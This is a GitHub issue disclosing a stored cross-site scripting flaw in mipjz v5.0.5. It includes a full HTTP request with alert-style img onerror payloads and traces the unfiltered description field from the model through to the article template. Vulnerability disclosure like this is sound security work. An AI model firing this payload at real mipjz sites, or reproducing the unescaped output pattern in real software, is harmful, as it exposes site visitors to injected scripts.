Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 #15

Open
sma11new opened this issue May 17, 2023 · 1 comment
Open

There is a cross site scripting (XSS) vulnerability exists in mipjz v5.0.5 #15

sma11new opened this issue May 17, 2023 · 1 comment

Comments

@sma11new
Copy link

[Vulnerability Description]
Cross SIte Scripting (XSS) vulnerability exists in mipjz v5.0.5, attackers can execute arbitrary code via the article description field from /article/ApiAdminArticle/itemAdd.

[Vulnerability Type]
Cross Site Scripting (XSS)

[Vendor of Product]
https://github.com/sansanyun/mipjz
http://www.mipjz.com/

[Affected Product Code Base]
v5.0.5

[Vulnerability Proof]

  1. Add an article, insert js code in the description parameter: xss
POST /index.php?s=/article/ApiAdminArticle/itemAdd HTTP/1.1
Host: 192.168.11.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
dataId: 
Content-Length: 426
Origin: http://192.168.11.102
Connection: close
Referer: http://192.168.11.102/index.php?s=/admin/
Cookie: csrf_49dccd=65bc5ef8; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1684330392; Hm_lpvt_3155433929be1afd6cef849b9709d4d7=1684330392; PHPSESSID=rtdn09cuqpvt4chfomi043aun0

{"title":"xss","keywords":"123","description":"xss<img src onerror=alert(22)>","link_tags":"","url_name":"","content":"<p>123<br></p>","is_recommend":"0","tags":"xss&lt;img src onerror=alert(1)&gt;","publish_time":"","fieldList":"[{\"value\":\"\",\"key\":\"diy_aaa\",\"name\":\"<img src onerror=alert(1)>\"}]","img_url":"/public/uploads/temp/2023/05/17/6464f65ca6526.jpg"}

image

  1. Visit the article page, the code is loaded and executed

image

image

[Code Details]

  1. Add an article, receive parameters, and pass it to \app\article\model\Articles.php:itemAdd for processing

image

  1. \app\article\model\Articles.php:itemAdd does not check and filter the description, and directly stores it in the database

image

  1. Article Details \app\article\controller\ArticleDetail.php:index takes out the article description in the database and passes it to $mipDescription without filtering

image

  1. In the "guess you like" area in the article display \template\default\article\articleDetail.html, directly output the $mipDescription in the previous step, causing the malicious code to be executed

image
@attritionorg
Copy link

What level of authentication does this require?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@attritionorg @sma11new